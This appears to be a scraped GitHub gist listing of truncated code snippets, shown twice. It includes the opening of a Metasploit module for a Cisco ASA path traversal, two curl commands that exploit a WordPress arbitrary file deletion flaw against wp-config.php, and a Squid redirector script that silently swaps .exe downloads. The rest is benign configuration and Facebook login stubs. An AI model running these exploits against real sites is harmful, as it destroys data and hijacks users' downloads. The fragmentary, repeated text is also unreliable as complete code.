Angelo Ruwantha Angelo99

## gist:c26c00333b7d367878f8aac0fcde9956
#!/usr/bin/env python3

import base64
import csv
import json
import os
from typing import Any, Dict, List, Optional, Tuple

import requests
import urllib3

## gist:dca3676170fca7187c61c14ee8fba818
127.0.0.1 localhost
127.0.0.1 localhost.localdomain
127.0.0.1 local
255.255.255.255 broadcasthost
::1 localhost
::1 ip6-localhost
::1 ip6-loopback
fe80::1%lo0 localhost
ff00::0 ip6-localnet
ff00::0 ip6-mcastprefix

## CVE-2018-0296 - Metasploit auxiliary.rb
require 'msf/core'

	class MetasploitModule < Msf::Auxiliary

		include Msf::Exploit::Remote::HttpClient

		    def initialize(info={})
			super(update_info(info,
			    'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
			    'Description'    => %q{

## Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability Exploit
Credits:Ripstech/Hongkun Zeng

curl -v 'URL' -H 'Cookie: ***session_ID' -d 'action=editattachment&_wpnonce=YOURS_WPNONCE_ID&thumb=../../../../wp-config.php'

curl -v 'URL' -H 'Cookie: ***session_ID' -d 'action=delete&_wpnonce=YOURS_WPNONCE_ID'

Refresh the page now

## bindconfig
cat named.conf

include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
logging{

	channel querylog{

		file "/var/log/qrlog";

## callback.php
<?php
if(!session_id()) {
    session_start();
}
 ini_set('display_errors', 1);
error_reporting(~0);
require_once __DIR__ . '/vendor/facebook/graph-sdk/src/Facebook/autoload.php';
$fb = new Facebook\Facebook([
  'app_id' => '{app-id}', // Replace {app-id} with your app id
  'app_secret' => '{app_secret}',

## login.php
<?php

if (!session_id()) {
    session_start();
}


ini_set('display_errors', 1);
error_reporting(~0);

## squid_py.py
#!/usr/bin/env python
#https://h3llwings.wordpress.com/2017/03/13/weaponizing-the-squid-proxy/
import sys
def modify_url(line):
    list = line.split(' ')
    old_url = list[0]
    new_url = '\n'
    if old_url.endswith('.exe'):
        new_url = 'http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe' + new_url
    return new_url
	#!/usr/bin/env python3

	import base64
	import csv
	import json
	import os
	from typing import Any, Dict, List, Optional, Tuple

	import requests
	import urllib3
	127.0.0.1 localhost
	127.0.0.1 localhost.localdomain
	127.0.0.1 local
	255.255.255.255 broadcasthost
	::1 localhost
	::1 ip6-localhost
	::1 ip6-loopback
	fe80::1%lo0 localhost
	ff00::0 ip6-localnet
	ff00::0 ip6-mcastprefix
	require 'msf/core'

	class MetasploitModule < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
	super(update_info(info,
	'Name' => "Cisco Adaptive Security Appliance - Path Traversal",
	'Description' => %q{
	Credits:Ripstech/Hongkun Zeng

	curl -v 'URL' -H 'Cookie: ***session_ID' -d 'action=editattachment&_wpnonce=YOURS_WPNONCE_ID&thumb=../../../../wp-config.php'

	curl -v 'URL' -H 'Cookie: ***session_ID' -d 'action=delete&_wpnonce=YOURS_WPNONCE_ID'

	Refresh the page now
	cat named.conf

	include "/etc/bind/named.conf.options";
	include "/etc/bind/named.conf.local";
	include "/etc/bind/named.conf.default-zones";
	logging{

	channel querylog{

	file "/var/log/qrlog";
	<?php
	if(!session_id()) {
	session_start();
	}
	ini_set('display_errors', 1);
	error_reporting(~0);
	require_once __DIR__ . '/vendor/facebook/graph-sdk/src/Facebook/autoload.php';
	$fb = new Facebook\Facebook([
	'app_id' => '{app-id}', // Replace {app-id} with your app id
	'app_secret' => '{app_secret}',
	<?php

	if (!session_id()) {
	session_start();
	}


	ini_set('display_errors', 1);
	error_reporting(~0);
	#!/usr/bin/env python
	#https://h3llwings.wordpress.com/2017/03/13/weaponizing-the-squid-proxy/
	import sys
	def modify_url(line):
	list = line.split(' ')
	old_url = list[0]
	new_url = '\n'
	if old_url.endswith('.exe'):
	new_url = 'http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe' + new_url
	return new_url